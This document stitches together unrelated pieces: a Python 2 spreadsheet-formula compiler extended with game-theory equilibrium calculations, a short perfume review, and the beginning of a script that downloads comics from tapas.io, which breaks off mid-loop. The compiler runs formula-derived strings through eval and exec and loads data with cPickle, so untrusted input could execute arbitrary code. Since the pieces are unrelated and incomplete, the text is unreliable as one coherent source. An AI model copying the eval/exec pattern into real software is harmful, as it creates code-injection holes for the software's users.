def __init__(self, G, cellmap):
super(Spreadsheet, self).__init__()
self.G = G
self.cellmap = cellmap
self.params = None
@staticmethod
def load_from_file(fname):
f = open(fname, 'rb')
obj = cPickle.load(f)
# obj = load(f)
return obj
def save_to_file(self, fname):
f = open(fname, 'wb')
cPickle.dump(self, f, protocol=2)
f.close()
def export_to_dot(self, fname):
write_dot(self.G, fname)
def export_to_gexf(self, fname):
write_gexf(self.G, fname)
def plot_graph(self):
import matplotlib.pyplot as plt
pos = nx.spring_layout(self.G, iterations=2000)
# pos=nx.spectral_layout(G)
# pos = nx.random_layout(G)
nx.draw_networkx_nodes(self.G, pos)
nx.draw_networkx_edges(self.G, pos, arrows=True)
nx.draw_networkx_labels(self.G, pos)
plt.show()
def set_value(self, cell, val, is_addr=True):
if is_addr:
cell = self.cellmap[cell]
if cell.value != val:
# reset the node + its dependencies
self.reset(cell)
# set the value
cell.value = val
def reset(self, cell):
if cell.value is None: return
# print "resetting", cell.address()
cell.value = None
map(self.reset, self.G.successors_iter(cell))
def print_value_tree(self, addr, indent):
cell = self.cellmap[addr]
print "%s %s = %s" % (" " * indent, addr, cell.value)
for c in self.G.predecessors_iter(cell):
self.print_value_tree(c.address(), indent + 1)
def recalculate(self):
for c in self.cellmap.values():
if isinstance(c, CellRange):
self.evaluate_range(c, is_addr=False)
else:
self.evaluate(c, is_addr=False)
def evaluate_range(self, rng, is_addr=True):
if is_addr:
rng = self.cellmap[rng]
# its important that [] gets treated ad false here
if rng.value:
return rng.value
cells, nrows, ncols = rng.celladdrs, rng.nrows, rng.ncols
if nrows == 1 or ncols == 1:
data = [self.evaluate(c) for c in cells]
else:
data = [[self.evaluate(c) for c in cells[i]] for i in range(len(cells))]
rng.value = data
return data
def evaluate(self, cell, is_addr=True):
if is_addr:
cell = self.cellmap[cell]
# no formula, fixed value
if not cell.formula or cell.value != None:
# print " returning constant or cached value for ", cell.address()
return cell.value
# recalculate formula
# the compiled expression calls this function
def eval_cell(address):
return self.evaluate(address)
def eval_range(rng):
return self.evaluate_range(rng)
try:
print "Evalling: %s, %s" % (cell.address(), cell.python_expression)
vv = eval(cell.compiled_expression)
# print "Cell %s evalled to %s" % (cell.address(),vv)
if vv is None:
print "WARNING %s is None" % (cell.address())
cell.value = vv
except Exception as e:
if e.message.startswith("Problem evalling"):
raise e
else:
raise Exception("Problem evalling: %s for %s, %s" % (e, cell.address(), cell.python_expression))
return cell.value
class ASTNode(object):
"""A generic node in the AST"""
def __init__(self, token):
super(ASTNode, self).__init__()
self.token = token
def __str__(self):
return self.token.tvalue
def __getattr__(self, name):
return getattr(self.token, name)
def children(self, ast):
args = ast.predecessors(self)
args = sorted(args, key=lambda x: ast.node[x]['pos'])
# args.reverse()
return args
def parent(self, ast):
args = ast.successors(self)
return args[0] if args else None
def emit(self, ast, context=None):
"""Emit code"""
self.token.tvalue
class OperatorNode(ASTNode):
def __init__(self, *args):
super(OperatorNode, self).__init__(*args)
# convert the operator to python equivalents
self.opmap = {
"^": "**",
"=": "==",
"&": "+",
"": "+" # union
}
def emit(self, ast, context=None):
xop = self.tvalue
# Get the arguments
args = self.children(ast)
op = self.opmap.get(xop, xop)
if self.ttype == "operator-prefix":
return "-" + args[0].emit(ast, context=context)
parent = self.parent(ast)
# dont render the ^{1,2,..} part in a linest formula
# TODO: bit of a hack
if op == "**":
if parent and parent.tvalue.lower() == "linest":
return args[0].emit(ast, context=context)
# TODO silly hack to work around the fact that None < 0 is True (happens on blank cells)
if op == "<" or op == "<=":
aa = args[0].emit(ast, context=context)
ss = "(" + aa + " if " + aa + " is not None else float('inf'))" + op + args[1].emit(ast, context=context)
elif op == ">" or op == ">=":
aa = args[1].emit(ast, context=context)
ss = args[0].emit(ast, context=context) + op + "(" + aa + " if " + aa + " is not None else float('inf'))"
else:
ss = args[0].emit(ast, context=context) + op + args[1].emit(ast, context=context)
# avoid needless parentheses
if parent and not isinstance(parent, FunctionNode):
ss = "(" + ss + ")"
return ss
class OperandNode(ASTNode):
def __init__(self, *args):
super(OperandNode, self).__init__(*args)
def emit(self, ast, context=None):
t = self.tsubtype
if t == "logical":
return str(self.tvalue.lower() == "true")
elif t == "text" or t == "error":
# if the string contains quotes, escape them
val = self.tvalue.replace('"', '\\"')
return '"' + val + '"'
else:
return str(self.tvalue)
class RangeNode(OperandNode):
"""Represents a spreadsheet cell or range, e.g., A5 or B3:C20"""
def __init__(self, *args):
super(RangeNode, self).__init__(*args)
def get_cells(self):
return resolve_range(self.tvalue)[0]
def emit(self, ast, context=None):
# resolve the range into cells
rng = self.tvalue.replace('$', '')
sheet = context.curcell.sheet + "!" if context else ""
if is_range(rng):
sh, start, end = split_range(rng)
if sh:
str = 'eval_range("' + rng + '")'
else:
str = 'eval_range("' + sheet + rng + '")'
else:
sh, col, row = split_address(rng)
if sh:
str = 'eval_cell("' + rng + '")'
else:
str = 'eval_cell("' + sheet + rng + '")'
return str
class FunctionNode(ASTNode):
"""AST node representing a function call"""
def __init__(self, *args):
super(FunctionNode, self).__init__(*args)
self.numargs = 0
# map excel functions onto their python equivalents
self.funmap = pycel.excellib.FUNCTION_MAP
def emit(self, ast, context=None):
fun = self.tvalue.lower()
str = ''
# Get the arguments
args = self.children(ast)
if fun == "atan2":
# swap arguments
str = "atan2(%s,%s)" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context))
elif fun == "pi":
# constant, no parens
str = "pi"
elif fun == "if":
# inline the if
if len(args) == 2:
str = "%s if %s else 0" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context))
elif len(args) == 3:
str = "(%s if %s else %s)" % (args[1].emit(ast, context=context), args[0].emit(ast, context=context),
args[2].emit(ast, context=context))
else:
raise Exception("if with %s arguments not supported" % len(args))
elif fun == "array":
str += '['
if len(args) == 1:
# only one row
str += args[0].emit(ast, context=context)
else:
# multiple rows
str += ",".join(['[' + n.emit(ast, context=context) + ']' for n in args])
str += ']'
elif fun == "arrayrow":
# simply create a list
str += ",".join([n.emit(ast, context=context) for n in args])
elif fun == "linest" or fun == "linestmario":
str = fun + "(" + ",".join([n.emit(ast, context=context) for n in args])
if not context:
degree, coef = -1, -1
else:
# linests are often used as part of an array formula spanning multiple cells,
# one cell for each coefficient. We have to figure out where we currently are
# in that range
degree, coef = get_linest_degree(context.excel, context.curcell)
# if we are the only linest (degree is one) and linest is nested -> return vector
# else return the coef.
if degree == 1 and self.parent(ast):
if fun == "linest":
str += ",degree=%s)" % degree
else:
str += ")"
else:
if fun == "linest":
str += ",degree=%s)[%s]" % (degree, coef - 1)
else:
str += ")[%s]" % (coef - 1)
elif fun == "and":
str = "all([" + ",".join([n.emit(ast, context=context) for n in args]) + "])"
elif fun == "or":
str = "any([" + ",".join([n.emit(ast, context=context) for n in args]) + "])"
else:
# map to the correct name
f = self.funmap.get(fun, fun)
str = f + "(" + ",".join([n.emit(ast, context=context) for n in args]) + ")"
return str
def create_node(t):
"""Simple factory function"""
if t.ttype == "operand":
if t.tsubtype == "range":
return RangeNode(t)
else:
return OperandNode(t)
elif t.ttype == "function":
return FunctionNode(t)
elif t.ttype.startswith("operator"):
return OperatorNode(t)
else:
return ASTNode(t)
class Operator:
"""Small wrapper class to manage operators during shunting yard"""
def __init__(self, value, precedence, associativity):
self.value = value
self.precedence = precedence
self.associativity = associativity
def shunting_yard(expression):
"""
Tokenize an excel formula expression into reverse polish notation
Core algorithm taken from wikipedia with varargs extensions from
http://www.kallisti.net.nz/blog/2008/02/extension-to-the-shunting-yard-algorithm-to-allow-variable-numbers-of-arguments-to-functions/
"""
# remove leading =
if expression.startswith('='):
expression = expression[1:]
p = ExcelParser();
p.parse(expression)
# insert tokens for '(' and ')', to make things clearer below
tokens = []
for t in p.tokens.items:
if t.ttype == "function" and t.tsubtype == "start":
t.tsubtype = ""
tokens.append(t)
tokens.append(f_token('(', 'arglist', 'start'))
elif t.ttype == "function" and t.tsubtype == "stop":
tokens.append(f_token(')', 'arglist', 'stop'))
elif t.ttype == "subexpression" and t.tsubtype == "start":
t.tvalue = '('
tokens.append(t)
elif t.ttype == "subexpression" and t.tsubtype == "stop":
t.tvalue = ')'
tokens.append(t)
else:
tokens.append(t)
# print "tokens: ", "|".join([x.tvalue for x in tokens])
# http://office.microsoft.com/en-us/excel-help/calculation-operators-and-precedence-HP010078886.aspx
operators = {}
operators[':'] = Operator(':', 8, 'left')
operators[''] = Operator(' ', 8, 'left')
operators[','] = Operator(',', 8, 'left')
operators['u-'] = Operator('u-', 7, 'left') # unary negation
operators['%'] = Operator('%', 6, 'left')
operators['^'] = Operator('^', 5, 'left')
operators['*'] = Operator('*', 4, 'left')
operators['/'] = Operator('/', 4, 'left')
operators['+'] = Operator('+', 3, 'left')
operators['-'] = Operator('-', 3, 'left')
operators['&'] = Operator('&', 2, 'left')
operators['='] = Operator('=', 1, 'left')
operators['<'] = Operator('<', 1, 'left')
operators['>'] = Operator('>', 1, 'left')
operators['<='] = Operator('<=', 1, 'left')
operators['>='] = Operator('>=', 1, 'left')
operators['<>'] = Operator('<>', 1, 'left')
output = collections.deque()
stack = []
were_values = []
arg_count = []
for t in tokens:
if t.ttype == "operand":
output.append(create_node(t))
if were_values:
were_values.pop()
were_values.append(True)
elif t.ttype == "function":
stack.append(t)
arg_count.append(0)
if were_values:
were_values.pop()
were_values.append(True)
were_values.append(False)
elif t.ttype == "argument":
while stack and (stack[-1].tsubtype != "start"):
output.append(create_node(stack.pop()))
if were_values.pop(): arg_count[-1] += 1
were_values.append(False)
if not len(stack):
raise Exception("Mismatched or misplaced parentheses")
elif t.ttype.startswith('operator'):
if t.ttype.endswith('-prefix') and t.tvalue == "-":
o1 = operators['u-']
else:
o1 = operators[t.tvalue]
while stack and stack[-1].ttype.startswith('operator'):
if stack[-1].ttype.endswith('-prefix') and stack[-1].tvalue == "-":
o2 = operators['u-']
else:
o2 = operators[stack[-1].tvalue]
if ((o1.associativity == "left" and o1.precedence <= o2.precedence)
or
(o1.associativity == "right" and o1.precedence < o2.precedence)):
output.append(create_node(stack.pop()))
else:
break
stack.append(t)
elif t.tsubtype == "start":
stack.append(t)
elif t.tsubtype == "stop":
while stack and stack[-1].tsubtype != "start":
output.append(create_node(stack.pop()))
if not stack:
raise Exception("Mismatched or misplaced parentheses")
stack.pop()
if stack and stack[-1].ttype == "function":
f = create_node(stack.pop())
a = arg_count.pop()
w = were_values.pop()
if w: a += 1
f.num_args = a
# print f, "has ",a," args"
output.append(f)
while stack:
if stack[-1].tsubtype == "start" or stack[-1].tsubtype == "stop":
raise Exception("Mismatched or misplaced parentheses")
output.append(create_node(stack.pop()))
# print "Stack is: ", "|".join(stack)
# print "Ouput is: ", "|".join([x.tvalue for x in output])
# convert to list
result = [x for x in output]
return result
def build_ast(expression):
"""build an AST from an Excel formula expression in reverse polish notation"""
# use a directed graph to store the tree
G = DiGraph()
stack = []
for n in expression:
# Since the graph does not maintain the order of adding nodes/edges
# add an extra attribute 'pos' so we can always sort to the correct order
if isinstance(n, OperatorNode):
if n.ttype == "operator-infix":
arg2 = stack.pop()
arg1 = stack.pop()
G.add_node(arg1, {'pos': 1})
G.add_node(arg2, {'pos': 2})
G.add_edge(arg1, n)
G.add_edge(arg2, n)
else:
arg1 = stack.pop()
G.add_node(arg1, {'pos': 1})
G.add_edge(arg1, n)
elif isinstance(n, FunctionNode):
args = [stack.pop() for _ in range(n.num_args)]
args.reverse()
for i, a in enumerate(args):
G.add_node(a, {'pos': i})
G.add_edge(a, n)
# for i in range(n.num_args):
# G.add_edge(stack.pop(),n)
else:
G.add_node(n, {'pos': 0})
stack.append(n)
return G, stack.pop()
class Context(object):
"""A small context object that nodes in the AST can use to emit code"""
def __init__(self, curcell, excel):
# the current cell for which we are generating code
self.curcell = curcell
# a handle to an excel instance
self.excel = excel
class ExcelCompiler(object):
"""Class responsible for taking an Excel spreadsheet and compiling it to a Spreadsheet instance
that can be serialized to disk, and executed independently of excel.
"""
def __init__(self, filename=None, excel=None, *args, **kwargs):
super(ExcelCompiler, self).__init__()
self.filename = filename
if excel:
# if we are running as an excel addin, this gets passed to us
self.excel = excel
else:
# TODO: use a proper interface so we can (eventually) support loading from file (much faster) Still need to find a good lib though.
self.excel = ExcelWrapperImpl(filename=filename)
self.excel.connect()
self.log = logging.getLogger("decode.{0}".format(self.__class__.__name__))
def cell2code(self, cell):
"""Generate python code for the given cell"""
if cell.formula:
e = shunting_yard(cell.formula or str(cell.value))
print e
ast, root = build_ast(e)
code = root.emit(ast, context=Context(cell, self.excel))
else:
ast = None
code = str('"' + cell.value + '"' if isinstance(cell.value, unicode) else cell.value)
return code, ast
def add_node_to_graph(self, G, n):
G.add_node(n)
G.node[n]['sheet'] = n.sheet
if isinstance(n, Cell):
G.node[n]['label'] = n.col + str(n.row)
else:
# strip the sheet
G.node[n]['label'] = n.address()[n.address().find('!') + 1:]
def gen_graph(self, seed, sheet=None):
"""Given a starting point (e.g., A6, or A3:B7) on a particular sheet, generate
a Spreadsheet instance that captures the logic and control flow of the equations."""
# starting points
cursheet = sheet if sheet else self.excel.get_active_sheet()
self.excel.set_sheet(cursheet)
seeds, nr, nc = Cell.make_cells(self.excel, seed,
sheet=cursheet) # no need to output nr and nc here, since seed can be a list of unlinked cells
seeds = list(flatten(seeds))
print "Seed %s expanded into %s cells" % (seed, len(seeds))
# only keep seeds with formulas or numbers
seeds = [s for s in seeds if s.formula or isinstance(s.value, (int, float))]
print "%s filtered seeds " % len(seeds)
# cells to analyze: only formulas
todo = [s for s in seeds if s.formula]
print "%s cells on the todo list" % len(todo)
# map of all cells
cellmap = dict([(x.address(), x) for x in seeds])
# directed graph
G = nx.DiGraph()
# match the info in cellmap
for c in cellmap.itervalues(): self.add_node_to_graph(G, c)
while todo:
c1 = todo.pop()
print "Handling ", c1.address()
# set the current sheet so relative addresses resolve properly
if c1.sheet != cursheet:
cursheet = c1.sheet
self.excel.set_sheet(cursheet)
# parse the formula into code
pystr, ast = self.cell2code(c1)
# set the code & compile it (will flag problems sooner rather than later)
c1.python_expression = pystr
c1.compile()
# get all the cells/ranges this formula refers to
deps = [x.tvalue.replace('$', '') for x in ast.nodes() if isinstance(x, RangeNode)]
# remove dupes
deps = uniqueify(deps)
for dep in deps:
# if the dependency is a multi-cell range, create a range object
if is_range(dep):
# this will make sure we always have an absolute address
rng = CellRange(dep, sheet=cursheet)
if rng.address() in cellmap:
# already dealt with this range
# add an edge from the range to the parent
G.add_edge(cellmap[rng.address()], cellmap[c1.address()])
continue
else:
# turn into cell objects
cells, nrows, ncols = Cell.make_cells(self.excel, dep, sheet=cursheet)
# get the values so we can set the range value
if nrows == 1 or ncols == 1:
rng.value = [c.value for c in cells]
else:
rng.value = [[c.value for c in cells[i]] for i in range(len(cells))]
# save the range
cellmap[rng.address()] = rng
# add an edge from the range to the parent
self.add_node_to_graph(G, rng)
G.add_edge(rng, cellmap[c1.address()])
# cells in the range should point to the range as their parent
target = rng
else:
# not a range, create the cell object
cells = [Cell.resolve_cell(self.excel, dep, sheet=cursheet)]
target = cellmap[c1.address()]
# process each cell
for c2 in flatten(cells):
# if we havent treated this cell allready
if c2.address() not in cellmap:
if c2.formula:
# cell with a formula, needs to be added to the todo list
todo.append(c2)
# print "appended ", c2.address()
else:
# constant cell, no need for further processing, just remember to set the code
pystr, ast = self.cell2code(c2)
c2.python_expression = pystr
c2.compile()
# print "skipped ", c2.address()
# save in the cellmap
cellmap[c2.address()] = c2
# add to the graph
self.add_node_to_graph(G, c2)
# add an edge from the cell to the parent (range or cell)
G.add_edge(cellmap[c2.address()], target)
print "Graph construction done, %s nodes, %s edges, %s cellmap entries" % (
len(G.nodes()), len(G.edges()), len(cellmap))
sp = Spreadsheet(G, cellmap)
return sp
if __name__ == '__main__':
import re
def encode_conditions(conditions):
for i in range(len(conditions)):
conditions[i] = conditions[i].replace("(s)", '("s")')
conditions[i] = conditions[i].replace("(r)", '("r")')
exists = re.findall(r'(exists\(.*?\))', conditions[i], re.M | re.I)
for j in range(len(exists)):
conditions[i] = conditions[i].replace(exists[j], '\"' + exists[j] + '\"')
for_each = re.findall(r'(foreach\(.*?\))', conditions[i], re.M | re.I)
for j in range(len(for_each)):
conditions[i] = conditions[i].replace(for_each[j], '\"' + for_each[j] + '\"')
return conditions
def generate_quantifier_vector(quantifier, type='exists'):
'''Receive an exist condition and generate a boolean vector based on it's condition
Type can be either exists or for_each'''
exp_in_paranth = re.findall(r'' + type + '\((.*?)\)', quantifier, re.M | re.I)
exp_in_paranth = exp_in_paranth[0].split(",")
vecs = re.findall(r'(.)\[.\]', exp_in_paranth[-1], re.M | re.I)
condition_vec = "1 " if type == 'exists' else "0 "
condition_vec += "in [1 if " + exp_in_paranth[-1] + " else 0 "
for i in range(len(exp_in_paranth) - 1):
condition_vec += "for " + exp_in_paranth[i] + " in range(len(" + vecs[i] + ")) "
condition_vec += "]"
return condition_vec
def decode_conditions(conditions):
for i in range(len(conditions)):
conditions[i] = conditions[i].replace('("s")', '(s)')
conditions[i] = conditions[i].replace('("r")', '(r)')
for quantifier in ['exists', 'foreach']:
exists = re.findall(r'\"(' + quantifier + '\(.*?\))\"', conditions[i], re.M | re.I)
for j in range(len(exists)):
exists_with_indices = list(exists)
entries = re.findall(r'(._.)', exists[j], re.M | re.I)
for k in range(len(entries)):
exists_with_indices[j] = exists_with_indices[j].replace(entries[k],
(entries[k].replace("_", "[") + "]"))
if not (">" in exists_with_indices[j]) and not ("<" in exists_with_indices[j]):
exists_with_indices[j] = exists_with_indices[j].replace("=", "==")
exists_with_indices[j] = generate_quantifier_vector(exists_with_indices[j], quantifier)
conditions[i] = conditions[i].replace('\"' + exists[j] + '\"', exists_with_indices[j])
return conditions
def parse_conditions(conds):
conds = encode_conditions(conds)
python_inputs = []
for i in conds:
print "**************************************************"
print "Formula: ", i
e = shunting_yard(i);
# print "RPN: ", "|".join([str(x) for x in e])
G, root = build_ast(e)
python_inputs += [root.emit(G, context=None)]
print "Python code: ", root.emit(G, context=None)
print "**************************************************"
return decode_conditions(python_inputs)
def classify_strategies_to_dimensions(strategies, dimensions_matrix, dimensions_rows_conds,
dimensions_columns_conds):
row = ""
col = ""
for t in strategies:
s = tuple(t)
exec "row =" + dimensions_rows_conds[0]
exec "col =" + dimensions_columns_conds[0]
dimensions_matrix[row][col][s] = dict()
return dimensions_matrix
def create_dimensions_matrix(dimensions_rows_categories_names, dimensions_columns_categories_names):
dimensions_matrix = {row_name: dict() for row_name in dimensions_rows_categories_names}
for row_name in dimensions_matrix:
for col_name in dimensions_columns_categories_names:
dimensions_matrix[row_name][col_name] = dict()
return dimensions_matrix
def calc_payments(dimensions_matrix,payment_conds):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
# print "first level= "+str(row)+","+str(col)+":"+str(strategy)
for row2 in dimensions_matrix:
dimensions_matrix[row][col][strategy][row2] = dict()
for col2 in dimensions_matrix[row2]:
dimensions_matrix[row][col][strategy][row2][col2] = dict()
for strategy2 in dimensions_matrix[row2][col2]:
dimensions_matrix[row][col][strategy][row2][col2][strategy2] = dict()
# print "second level= "+str(row)+","+str(col)+":"+str(strategy)+str(row2)+","+str(col2)+":"+str(strategy2)
s = strategy
r = strategy2
payment = 0
exec "payment=" + payment_conds[0]
dimensions_matrix[row][col][strategy][row2][col2][strategy2]["val"] = payment
# print "third level= " + str(row) + "," + str(col) + ":" + str(strategy) + str(
# row2) + "," + str(col2) + ":" + str(strategy2)+"="+str(payment)
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
for row2 in dimensions_matrix[row][col][strategy]:
for col2 in dimensions_matrix[row][col][strategy][row2]:
cell_size = len(dimensions_matrix[row][col][strategy][row2][col2])
pyments_in_cell = [
eval(str(dimensions_matrix[row][col][strategy][row2][col2][strategy2]["val"])) for
strategy2
in dimensions_matrix[row][col][strategy][row2][col2]]
uni_payment = sum([(1 / float(cell_size)) * payment for payment in pyments_in_cell])
dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"] = uni_payment
# print "second level= " + str(row) + "," + str(col) + ":" + str(strategy) + str(
# row2) + "," + str(col2) + ":" + str(len(dimensions_matrix[row][col][strategy][row2][col2]))+",uni="+str(uni_payment)
# dimensions_matrix_copy = dict(dimensions_matrix)
# for row in dimensions_matrix:
# for col in dimensions_matrix[row]:
# strategy = dimensions_matrix[row][col].keys()[0]
# for row2 in dimensions_matrix[row][col][strategy]:
# for col2 in dimensions_matrix[row][col][strategy][row2]:
# if row==row2 and col==col2:
# # a=1
# dimensions_matrix_copy[row][col]["uniform_payment"]= dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"]
# dimensions_matrix = dict(dimensions_matrix_copy)
return dimensions_matrix
def calc_MD_eq(dimensions_matrix, dimensions_ordered_row, dimensions_ordered_col):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
is_MD_eq = True
row_index = dimensions_ordered_row.index(row)
if row_index != 0:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][dimensions_ordered_row[row_index - 1]][col][
"uniform_payment"]:
is_MD_eq = False
if row_index != len(dimensions_ordered_row) - 1:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][dimensions_ordered_row[row_index + 1]][col][
"uniform_payment"]:
is_MD_eq = False
col_index = dimensions_ordered_col.index(col)
if col_index != 0:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row][dimensions_ordered_col[col_index - 1]][
"uniform_payment"]:
is_MD_eq = False
if col_index != len(dimensions_ordered_col) - 1:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row][dimensions_ordered_col[col_index + 1]][
"uniform_payment"]:
is_MD_eq = False
if is_MD_eq:
dimensions_matrix[row][col][strategy]["is_MD_eq"] = True
else:
dimensions_matrix[row][col][strategy]["is_MD_eq"] = False
return dimensions_matrix
def calc_Global_eq(dimensions_matrix):
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
if dimensions_matrix[row][col][strategy]["is_MD_eq"]:
is_Global_eq = True
for row2 in dimensions_matrix[row][col][strategy]:
if type(dimensions_matrix[row][col][strategy][row2]) != bool:
for col2 in dimensions_matrix[row][col][strategy][row2]:
if dimensions_matrix[row][col][strategy][row][col]["uniform_payment"] < \
dimensions_matrix[row][col][strategy][row2][col2]["uniform_payment"]:
is_Global_eq = False
if is_Global_eq:
dimensions_matrix[row][col][strategy]["is_Global_eq"] = True
else:
dimensions_matrix[row][col][strategy]["is_Global_eq"] = False
return dimensions_matrix
# some test formulas
payment_conds1 = [
# '=5*log(sin(6)+2)',
# '=5*log(sin(3,7,9)+2)',
# '=3 + 4 * 2 / ( 1 - 5 ) ^ 2 ^ 3',
'=IF(exists(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,s_i=r_i),0,IF(LEN(s)=2,3,2))',
]
# some test formulas
dimensions_conds1 = [
# '=5*log(sin(6)+2)',
# '=5*log(sin(3,7,9)+2)',
# '=3 + 4 * 2 / ( 1 - 5 ) ^ 2 ^ 3',
'=IF(exists(i,s_i=3),"center","not center")',
'=IF(len(s)>1,"two","one")',
# '=IF(foreach(i,j,s_i=r_j),0,IF(LEN(s)=2,3,2))',
# '=IF(foreach(i,s_i=r_i),0,IF(LEN(s)=2,3,2))',
]
#
# payment_conds = encode_conditions(payment_conds)
# print payment_conds
# python_inputs = []
# for i in payment_conds:
# print "**************************************************"
# print "Formula: ", i
# e = shunting_yard(i);
# # print "RPN: ", "|".join([str(x) for x in e])
# G, root = build_ast(e)
# python_inputs += [root.emit(G, context=None)]
# print "Python code: ", root.emit(G, context=None)
# print "**************************************************"
#
#
# print python_inputs
# payment_conds = parse_conditions(payment_conds1)
# print payment_conds
# print decode_conditions(python_inputs)
# dimensions_conds = parse_conditions(dimensions_conds)
# print dimensions_conds
# s = [2, 3]
# exec "print " + dimensions_conds[0]
strategies_vector1 = [[1], [2], [3], [4], [5], [1, 2], [2, 3], [3, 4], [4, 5]]
dimensions_rows_categories_names1 = {"dimensions_row_category_name_1": "center",
"dimensions_row_category_name_2": "not center"}
dimensions_columns_categories_names1 = {"dimensions_column_category_name_1": "one",
"dimensions_column_category_name_2": "two"}
dimensions_ordered_row1 = ["center", "not center"]
dimensions_ordered_col1 = ["one", "two"]
dimensions_rows_conds1 = [dimensions_conds1[0]]
dimensions_columns_conds1 = [dimensions_conds1[1]]
def full_calc(strategies_vector, dimensions_rows_conds, dimensions_columns_conds, dimensions_rows_categories_names,
dimensions_columns_categories_names, dimensions_ordered_row, dimensions_ordered_col,payment_conds):
dimensions_rows_conds = parse_conditions(dimensions_rows_conds)
dimensions_columns_conds = parse_conditions(dimensions_columns_conds)
payment_conds = parse_conditions(payment_conds)
dimensions_matrix = create_dimensions_matrix(dimensions_rows_categories_names,
dimensions_columns_categories_names)
print str(dimensions_matrix)
dimensions_matrix = classify_strategies_to_dimensions(strategies_vector, dimensions_matrix,
dimensions_rows_conds,
dimensions_columns_conds)
print dimensions_matrix
dimensions_matrix = calc_payments(dimensions_matrix,payment_conds)
print "\n calc global eq"
print "*************************************"
dimensions_matrix = calc_MD_eq(dimensions_matrix, dimensions_ordered_row, dimensions_ordered_col)
dimensions_matrix = calc_Global_eq(dimensions_matrix)
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
print str(row) + "," + str(col) + ":" + str(dimensions_matrix[row][col][strategy]["is_Global_eq"])
print "\n calc MD eq"
print "*************************************"
for row in dimensions_matrix:
for col in dimensions_matrix[row]:
for strategy in dimensions_matrix[row][col]:
print str(row) + "," + str(col) + ":" + str(dimensions_matrix[row][col][strategy]["is_MD_eq"])
full_calc(strategies_vector1, dimensions_rows_conds1, dimensions_columns_conds1,
dimensions_ordered_row1, dimensions_ordered_col1, dimensions_ordered_row1,
dimensions_ordered_col1,payment_conds1)
# for row in dimensions_matrix:
# for col in dimensions_matrix[row]:
# for strategy in dimensions_matrix[row][col]:
# print str(row) + "," + str(col) + ":" +str(dimensions_matrix[row][col][strategy]["is_Global_eq"])
# def calc_payments(dimensionized_conditions):
# for strategy in dimensionized_conditions:
|
I’m not really a fragrance person, but this Jo Loves scent in Pomelo is beautiful! It’s my go-to scent and I love how fresh and fruity it smells. I absolutely adore all of the Jo Loves scents, but this is probably one of my favourites!
This mouth-watering, Grapefruit-infused citrus is instantly refreshing and quickly gaining cult status.
Each scent is carefully crafted by Jo before receiving a single red dot – her creative signature and seal of integrity. |
#!/bin/env python3
from pyquery import PyQuery as pq
from pathlib import Path
import os
import argparse
import re
import requests
def lead0(num, max):
return str(num).zfill(len(str(max)))
def terminal_size():
try:
import fcntl
import termios
import struct
th, tw, hp, wp = struct.unpack('HHHH', fcntl.ioctl(0, termios.TIOCGWINSZ, struct.pack('HHHH', 0, 0, 0, 0)))
except (IOError, ModuleNotFoundError):
th, tw = 80, 200
return tw, th
def printLine(msg='', noNewLine=False):
terminalWidth = terminal_size()[0]
spaces = terminalWidth - len(msg)
if noNewLine:
if args.verbose:
print(' ' + msg + (' ' * (spaces - 1)))
else:
print(msg + (' ' * spaces), end='\r')
else:
print(msg + (' ' * spaces))
def check_path(path, slash=True, fat=False):
evil_chars = []
if slash:
evil_chars.append('/')
if fat:
evil_chars += ['?', '<', '>', '\\', ':', '*', '|', '"', '^']
return ''.join([char for char in path if char not in evil_chars])
# parse input and settup help
parser = argparse.ArgumentParser(description='Downloads Comics from \'https://tapas.io\'.\nIf folder of downloaded comic is found, it will only update (can be disabled with -f/--force).', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('url', metavar='URL/name', type=str, nargs='+',
help='URL or URL name to comic\nGo to the comic you want to download (any page)\nRightclick on the comic name in the upper left corner and select "Copy linkaddress" (Or similar) or just use the name behind series in the url\nExamples: https://tapas.io/series/Erma, RavenWolf, ...')
parser.add_argument('-f', '--force', action="store_true", help='Disables updater.')
parser.add_argument('-v', '--verbose', action="store_true", help='Enables verbose mode.')
parser.add_argument('-c', '--restrict-characters', action="store_true", help='Removes \'? < > \\ : * | " ^\' from file names')
parser.add_argument('-o', '--output-dir', type=str, nargs='?', default="", dest='baseDir', metavar='C:\\',
help='Output directory where comics should be placed.\nIf left blank, the script folder will be used.')
args = parser.parse_args()
basePath = ""
if (args.baseDir):
basePath = Path(args.baseDir)
for urlCount, url in enumerate(args.url):
# check url/name
if re.match(r'^https://tapas\.io/series/.+$', url):
urlName = url[url.rindex('/') + 1:]
else:
urlName = url
printLine('Loading ' + urlName + '...', True)
# Get comic start page and test if comic exsists
pageReqest = requests.get('https://tapas.io/series/' + urlName, headers={'user-agent': 'tapas-dl'})
if pageReqest.status_code != 200:
printLine('Error: Comic "{}" not found\n'.format(urlName))
break
page = pq(pageReqest.text)
name = page('.center-info__title.center-info__title--small').text()
author = page('div.viewer-section.viewer-section--episode a.name').text()
seriesId = page('.subscribe-btn').attr('data-id')
if len(page('.row-item--info > img')) > 0:
headerSrc = page('.row-item--info > img').attr('src')
else:
headerSrc = None
data = []
page = pq(requests.get(f'https://tapas.io/series/{seriesId}/episodes?page=1&sort=OLDEST&max_limit=99999999', # It's over 9000! But I love that they forgot to limit the max_limit, because that means I don't have to bother with pagination ^^
headers={'user-agent': 'tapas-dl'}).json()['data']['body'])
for episode in page('[data-permalink*="/episode/"]'):
